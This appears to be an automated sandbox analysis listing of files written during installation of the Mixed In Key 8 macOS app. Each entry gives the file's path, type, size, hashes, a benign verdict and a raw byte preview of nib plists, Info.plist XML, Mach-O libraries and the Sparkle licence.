                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/.BC.T_SbfZKv
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):7327
                                                                                                    Entropy (8bit):6.576807632328487
                                                                                                    Encrypted:false
                                                                                                    MD5:4491740B20199BC26AE73E8AEE2CCD93
                                                                                                    SHA1:8F870C1D949AB69CF0CB2410EBEB4B4EB5496243
                                                                                                    SHA-256:CA040FC4EF825F06127B5D8B1E1E14164EDC1FFF9C445A21E9E921ABF3DF4826
                                                                                                    SHA-512:0C0274A9860454660350B9290E5F191ECE2AFA96AD708272D3D7CA07142F822126E4A22223318581D883BE83F44703B25FBCC65DDFB6C25AA888D7336AAAE448
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top.......9.......#.$.*...2.7.?.S.\.].m.n.v.w.z.............................................................Q................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.......,.(.7...7.6.8.-.. ...!."[NSClassName...._..MIKTooltipPopoverViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.6..4.5...!.#..8.9.:.....<.=.>XNSSource]NSDestinationWNSLabel....... ..@.A.B...C.D.E.F.G.H.I.J.K.L.M.M.O.P.Q.RVNSCellWNSFrame_..NSAllowsLogicalLayoutDirection_..NSNextResponder[NSSuperviewXNSvFlags]NSNibTouchBar_.%NSTextFieldAlignmentRectInsetsVersionYNSEnabled....................... .T.C.E.F.U.V.W.X.P.O.P.[ZNSSubviews[NSFrameSize.&.%.".....$_..{{7, 10}, {426, 17}}..^._...`.a.b
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/.BC.T_XQPUja
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):1347
                                                                                                    Entropy (8bit):5.2196777127737395
                                                                                                    Encrypted:false
                                                                                                    MD5:485D214151A592AABA7D3DEDF183525A
                                                                                                    SHA1:86B06AC35DEF369B69BA621BCB29E5B7E9F29B18
                                                                                                    SHA-256:43BF99C5807B6C2E944FC8EB9DF00625FD8B1C42A8AF05C11B260B33C8AC66F6
                                                                                                    SHA-512:4960B85A7478C96511B2F96E22DD6606A8AE693120CBAC2917DC21410D8689AA6803A7724633AF6BD3A3726E3F2FAD7EDAEBFCBE1B4E06048DFAD7FCF8EFE059
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>MIKToolkit</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.MIKToolkit</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>MIKToolkit</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion</k
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/.BC.T_zKNlsk
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:PNG image, 12 x 12, 8-bit/color RGBA, non-interlaced
                                                                                                    Size (bytes):318
                                                                                                    Entropy (8bit):6.64053974597311
                                                                                                    Encrypted:false
                                                                                                    MD5:100146DB670B166E10A259A4773AB990
                                                                                                    SHA1:F91DFD9E3426440A3227CB9DFD1F763672979285
                                                                                                    SHA-256:7A196D759C0B5572BA1962D3086481289FFDF3988D391A025D649187950F269F
                                                                                                    SHA-512:BE599BFE084056D6D69BE5FC654B16AF5DE0AA5FBCBDC0323F9844502A64F7DDE0007CEA030B3F0727C58BFDA097E1A42F26052C7233ADBB2714D18AE8A5381D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .PNG........IHDR.............Vu\.....pHYs................ cHRM..m...s........T..o.......0.....6P......IDATx.l.Af.A...OG.RB.Y.. ..*!r..m..z..B..@..hW..'....*9F7ob..f1.........~./.p.>.l.L.Oq...?...>.....!e..=..N.W.#....<..6:.B.R.....R1.....2<.p-....}.WK.`..<...2.T.e./.z..R..`_.......*.,m.^.....>.....Z4.N.V.....IEND.B`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_HZrLNS
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15884
                                                                                                    Entropy (8bit):6.769025090825442
                                                                                                    Encrypted:false
                                                                                                    MD5:8855E6026F791F85C4F17B6B3A311501
                                                                                                    SHA1:FC0DF9C2B271E29BA712DD4139B2A1D3D0E805CB
                                                                                                    SHA-256:07E30860631B3E92D2F68B8FFEAEA48B9B9EDD060515142D53D5235B8B261B44
                                                                                                    SHA-512:1EB6945A4D7B4D84032633D477FBBD0891F07E24827D50472C76202AE81064971DE89FE87F077F95088691F9BCCE2B814AD54F232D4EC508CEEA43236D7DE6F8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............P.QX$versionX$objectsY$archiverT$top.......x.......#.$.*./.Q.R.S.T.U.a.e...................................................'.-.0.8...9.B.C.D.K.S.W.[._.d.e.j.o.p.z.{.|...........................................................................................(.5.L.+...B.?.C.D.E.F.G.J.MU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys...b.k.i.f.v...v.u.w.j.. ...!."[NSClassName...._. MIKCopyrightInfoWindowController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,..ZNS.objects..-...a....0.1.2.3.4.5.6.7.8.9...:.;.<.=.>.?.@.A.B.C.D.E.F.G.G.I.J.K.L.M.N.A.P\NSWindowRect_..NSUserInterfaceItemIdentifier]NSWindowTitleYNSMaxSize\NSWindowViewYNSMinSize_..NSWindowIsRestorable_..NSMinFullScreenContentSize_..NSMaxFullScreenContentSize\NSScreenRect_..NSWindowContentMinSize_..NSWind
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_aHIJdC
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):3778
                                                                                                    Entropy (8bit):6.510856256363383
                                                                                                    Encrypted:false
                                                                                                    MD5:DFB525048800D0CF8DA6C274A5AE83BA
                                                                                                    SHA1:F3C29B822132B63094E24438B34FE390E535E19B
                                                                                                    SHA-256:438B1FFD3C21D573F1481A67353A5ECFB5895965665C49C86905658E6A7FA535
                                                                                                    SHA-512:9A305637127AEBE73EA9F0B09F6567024B61C71A46433E6180269662F45759C55FF428630D5EC7DF2796E1207ECE0338354BF96500310BDA309BEF89D54EDCF4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............@.AX$versionX$objectsY$archiverT$top.......T.......#.$.*...2.:.B.\.d.w.x.y.z.{.|.}.~...............................P.....................................................................!...../.0.1.2.3.4.5.6.7.:.=U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....F.D.@.R...R.Q.S.E.. ...!."[NSClassName...._..MIKNewsWindowController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.9..4.5.6.7.8...).:.<.>.0..;.<.=.....?.@.AXNSSource]NSDestinationWNSLabel.....'.(..C.D.E.F.G...H.I.J.K.L.M.N.O.P.Q.R.S.T.O.V.W.V.Y.Z.[YGroupName_..UseBackForwardList[Preferences]NSNextKeyViewZAllowsUndoYFrameName[NSSuperviewXNSvFlags_..NSNextResponder[NSFrameSize[NSDragTypes]NSNibTouchBar.........&.................K.].L.N...J.[._.`.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_iJh6hr
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):11964
                                                                                                    Entropy (8bit):6.767832090877087
                                                                                                    Encrypted:false
                                                                                                    MD5:393749545737C09D7FE6831F9CFD7E16
                                                                                                    SHA1:1AE362BC643BDE40F86B2123AAFEBF97A6D202F5
                                                                                                    SHA-256:E9D1037A92B0504A63DA681ADDB56D51EE81CA768D8D561A2AD204C6E98A172E
                                                                                                    SHA-512:9E7D343B26C93F3B9CF221FBC2C7C4CAD4166372FE092412A5DBF5CF9D7185D63F1883069F8B10165AE7D5E905F23E7B9AAE21543609EB56BF6C003932B6A623
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E._.h.{.|.}.~.......................................................S.......................................).*.2.3.6.9.:.;.@.D.O.R.S.[.\.].p.s.t.u.}.~....................................................................................... .!.#.'.../.0.1.?.B.C.E.S.j.....j........................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName...._..MIKEULAController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...3.s.u.w.z.{...;..>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....1.2..F.G.H.I.J.K...L.M.N.O.P.Q.R.S.T.U.V.W.X.R.Z.[.Z.].^YGroupName_..UseBackForwardList[
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_m6pO1S
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode C program text
                                                                                                    Size (bytes):92
                                                                                                    Entropy (8bit):3.2610300066712608
                                                                                                    Encrypted:false
                                                                                                    MD5:51EF59B60E5B41B91519CC662A9FE886
                                                                                                    SHA1:3222CA0C39EB50AAF8126BAF852E55430C4718AF
                                                                                                    SHA-256:39CF2EE07B7B333E7C179D0BF4D798A5B72AF6A4E584F51E642703BBFA4FC828
                                                                                                    SHA-512:3952A908B72D44040F5072F6344F6327FC78981C3AA55E931ACAE84C0C9BCC0D148991CD564AF4803765C328CBF5F7EFE9EB558FC56E47E8206B7B706026F30A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ../.*. .L.o.c.a.l.i.z.e.d. .v.e.r.s.i.o.n.s. .o.f. .I.n.f.o...p.l.i.s.t. .k.e.y.s. .*./.....
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_sDiFyn
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):6612
                                                                                                    Entropy (8bit):6.631064723712792
                                                                                                    Encrypted:false
                                                                                                    MD5:CA2B238591127F45F847D580D2028DF6
                                                                                                    SHA1:7A5ACBE18BFDF2C3D7009D5274FF71400853C3FC
                                                                                                    SHA-256:B73F880204C719F805FABC706F5F144240A422B2E2BCCFC00C87F83678400F73
                                                                                                    SHA-512:1668D296085EFFEAB653B312BDE63BA180145C99B9593645AC3C16D8D8D75B03E6204EAC1130F861EFEFC2332EE47784128B93C35291BBFB41206B5E54659082
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............S.TX$versionX$objectsY$archiverT$top...............#.$.*...2.A.I.[.d.e...............................................................................................$.%.&.'.T.).-.1.4.5.:.\.].^._.f.q.t.u.}.~...................................................................................5.W.6.7.8.9.:.;.<.=.>.?.@.A.[.B.C.D.E.F.G.H.I.J.M.PU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....y.w.s...........x.. ...!."[NSClassName...._.%MIKPublicationServiceWindowController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.@..4.5.6.7.8.9.:.;.<.=.>.?.....$.E.X.Z.\._.a.c.h.o....B.C.D.....F.G.HXNSSource]NSDestinationWNSLabel..........J.K.L...M.N.O.P.Q.R.S.T.U.V.V.X.Y.ZVNSCellWNSFrame_..NSAllowsLogicalLayoutDirecti
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_vmr5Az
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):3825
                                                                                                    Entropy (8bit):6.522199258302331
                                                                                                    Encrypted:false
                                                                                                    MD5:8F9EFD15096E154A25404BFA11F6FF1F
                                                                                                    SHA1:DD835EDA744960521E031FC543ACEDECA3E2E192
                                                                                                    SHA-256:DE27BBD2696A2C34EF24D93F2581B40F8AE0D56A30F41FEFDFE3CAF5D8C28BFE
                                                                                                    SHA-512:9C404ABF0097DFD0CA53DC8EAC09C28BE8019A4E8BF83DA8ED694A453CDB53EEE582FCAC8885CC6BF67825F9AAAEAB63B9165F5E736E16515AF85D6106799F0E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............I.JX$versionX$objectsY$archiverT$top.......W.......#.$.*...2.;.C.].e.x.y.z.{.|.}.~.................................T.........................................................................).7.....8.9.:.;.<.=.>.?.@.C.FU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....H.F.B.U...U.T.V.G.. ...!."[NSClassName...._..MIKAboutBoxController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.:..4.5.6.7.8.9...).:.<.>.@.1..<.=.>.....@.A.BXNSSource]NSDestinationWNSLabel.....'.(..D.E.F.G.H...I.J.K.L.M.N.O.P.Q.R.S.T.U.P.W.X.W.Z.[.\YGroupName_..UseBackForwardList[Preferences]NSNextKeyViewZAllowsUndoYFrameName[NSSuperviewXNSvFlags_..NSNextResponder[NSFrameSize[NSDragTypes]NSNibTouchBar.........&.................L.^.M.O...
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_vsWhyG
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):22210
                                                                                                    Entropy (8bit):6.932573380579771
                                                                                                    Encrypted:false
                                                                                                    MD5:82D6CB606D6B8E63CA394511620AEAF2
                                                                                                    SHA1:030E149CC9B0ABD9022D82B1446792D4D2DBBF2E
                                                                                                    SHA-256:E40B0D41B44C248E34649615040F71FB036279CD6775F5196C066FE7A2D763E7
                                                                                                    SHA-512:611F297888F04D2B02CD5E49F186A19A32E799A6FCABDBABF08F75A7896C6BF6D2D82DA0C93AAA276ABABF4998CD4BC167F1C6679F02F4F2A23766E0794D3DF1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............A.BX$versionX$objectsY$archiverT$top........:.......#.$.*...2.I.Q.o.p.q.r.~...........................................................#.+./.3.7.:.?.@.E.H.N.X.Y.f.g.l.m.r.w.x...................................................................................8.>.P.T.d.e.q.{................................................................................. .#./.0.1.5.>.?.D.F.I.J.L.M.N.O.R.S.W.\.].b.c.h.i.n.s.x.}.~.......................f.............................................................................!.%.).*.+.7.8.9.:.;.<.C.D.E.F.M.N.O.P.X.Y.Z.`.a.b...........j.n............................................. .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.;.>U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys...............8....8..7..9..... ...!."[NSClassName...._..MIKFeedback
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/_CodeSignature/.BC.T_y0cu4H
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):6479
                                                                                                    Entropy (8bit):5.15373872982817
                                                                                                    Encrypted:false
                                                                                                    MD5:722AD93CF53ED2BFAB0E8021ED97815C
                                                                                                    SHA1:4E0FC37221EB73DE288F64AF5FA1A16DBCCB3EAE
                                                                                                    SHA-256:1B1B48D32039690B562477261064B34A903E722D8A57D0C27C8BADEE00BF5AC5
                                                                                                    SHA-512:1B0FB100A21D9B0C6F1EBC0BC4CA7624227DE113509F41BE12DC2A6BE55180E73A187A85F94D240FDB20409CED296740FBEFA6FA400A705929AC8C8FFCA54DC3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Info.plist</key>...<data>...hrBqw13vNptpumIbyynlt+nymxg=...</data>...<key>Resources/SlideUpPanel.nib</key>...<data>...rQvFL7KWLcuwSEz0WNYegk4rh28=...</data>...<key>Resources/TooltipPopoverView.nib</key>...<data>...j4cMHZSatpzwyyQQ6+tLTrVJYkM=...</data>...<key>Resources/XButton.png</key>...<data>...+R39njQmRAoyJ8ud/R92NnKXkoU=...</data>...<key>Resources/en.lproj/About.nib</key>...<dict>....<key>hash</key>....<data>....3YNe2nRJYFIeAx/FQ6zt7KPi4ZI=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/en.lproj/CopyrightInformation.nib</key>...<dict>....<key>hash</key>....<data>..../A35wrJx4punEt1BObKh09DoBcs=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/en.lproj/EULA.nib</key>...<dict>....<key>hash</key>....<data>....GuNivGQ73kD4ayEjq
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/.BC.T_jFJ13M
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):74016
                                                                                                    Entropy (8bit):4.873539994633014
                                                                                                    Encrypted:false
                                                                                                    MD5:30C88DC101BB17553462F59F24664D3E
                                                                                                    SHA1:4B0FB332D7D26A60487D5219C95A6199FF0EC29F
                                                                                                    SHA-256:6F172F4786E90F6B316D1224BA83208CFFC048F7CF057ED02209B0FC6FA21E72
                                                                                                    SHA-512:0EEA0404730064D4115ABE180BEDE858E29EB2817C4ADFEC768F5D63D66D061882451FF9C1EDF9AC9BF3078519F8F99A83DC40F0AD11121196F8151A72497DC2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................................h...__TEXT...................p...............p......................__text..........__TEXT................../7......................................__stubs.........__TEXT...........H......V........H..............................__stub_helper...__TEXT..........`I......J.......`I..............................__cstring.......__TEXT...........K...............K..............................__objc_methname.__TEXT...........S...............S..............................__objc_classname__TEXT.........._\......l......._\..............................__objc_methtype.__TEXT...........\...............\..............................__const.........__TEXT...........]......@........]..............................__unwind_info...__TEXT...........]......$........]..............................__eh_frame......__TEXT...........^...............^......................................__DATA...........p....... .......p....... ......................__nl_symbol_ptr.__DATA..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/.BC.T_m0cJ5l
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):284336
                                                                                                    Entropy (8bit):5.832940969122625
                                                                                                    Encrypted:false
                                                                                                    MD5:09F3A09E337714AD2FD5ACB807977841
                                                                                                    SHA1:00273BC0D823B5BF8E42B25F98E293A16C84C729
                                                                                                    SHA-256:9ACE1B161700F7A7ED5FC4DF15C35121616B77DE28C59C1902FD1A847C00373D
                                                                                                    SHA-512:439C5B695CA488116687591DC28350835ADFCA7986B3A579449EF9DA6CE69077F140EDB39DBD482BF8F0CAFCB54B744FD7D26554C4298346DE0F4D3FF8B7CA1D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................H...................__TEXT...................P...............P......................__text..........__TEXT..........\........^......\...............................__stubs.........__TEXT..........\r......2.......\r..............................__stub_helper...__TEXT...........v...............v..............................__cstring.......__TEXT...........}......@,.......}..............................__const.........__TEXT..................P.......................................__gcc_except_tab__TEXT..........0...............0...............................__objc_methname.__TEXT..........L.......];......L...............................__objc_classname__TEXT..................`.......................................__objc_methtype.__TEXT..........................................................__unwind_info...__TEXT..........8.......@.......8...............................__eh_frame......__TEXT..........x........R......x...................................8...__DATA..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.T_3Hh3Nv
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text, with very long lines
                                                                                                    Size (bytes):2530
                                                                                                    Entropy (8bit):5.198727465723452
                                                                                                    Encrypted:false
                                                                                                    MD5:A95B27511029996D8C4A9CE01D2456CD
                                                                                                    SHA1:9FCF1E59531915A00BBB40989EB1B14CDA29F84F
                                                                                                    SHA-256:39CB8874DB1D2B98F1021490C84DE220F11FFDF7834A9E2C8AFF6DBC26BB655D
                                                                                                    SHA-512:03A2E0FF1C46CBCF6D1336F39F01E43527271C7C17A7DA4F5765E523764B2A3946A9A4879A420904EFF397F3D495F3270424EBB36F16D13A2CC4F453D4ACF0DA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: Copyright (c) 2006 Andy Matuschak..Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH T
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.T_Xr9TqL
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):11630
                                                                                                    Entropy (8bit):6.73082339431031
                                                                                                    Encrypted:false
                                                                                                    MD5:984722CB755E148570586FF148177FE8
                                                                                                    SHA1:B18B31FB225D93B5398E5693E548E46003B6BD86
                                                                                                    SHA-256:C5E5602B154E2A0AE88B5885DBBBD4F678F1CB2CE26E1049720C13F8462AEFEA
                                                                                                    SHA-512:25D7510BD8F2B184CD6B7E9EEA3780F544E69F662E735BDBD691D4A066207D65B9AC80879DAB3811964A6D9CB2D65357E5B526A19779A156417C449FF640BE26
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.@.H.^.f.i.m.n.o...........................................................................(.../.0.3.6.9.C.D.N.O.S.T.^._.`.i.p.t.x.|.....................................................................................................!.".$.3.N.....f.i.j.[.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.{.|.}....U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.......~.z.............. ...!."[NSClassName...._..SUStatusController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.?..4.5.6.7.8.9.:.;.<.=.>..... .[.`.g.k.o.r.t.w....A.B.C.....E.F.GXNSSource]NSDestinationWNSLabel..........I.J.K.L...M.N.O.P.Q.R.S.T.U.V.W.X.Y.Y.[.\.]VNSCellWNSFrame_..NSAllowsLogicalLayoutDirect
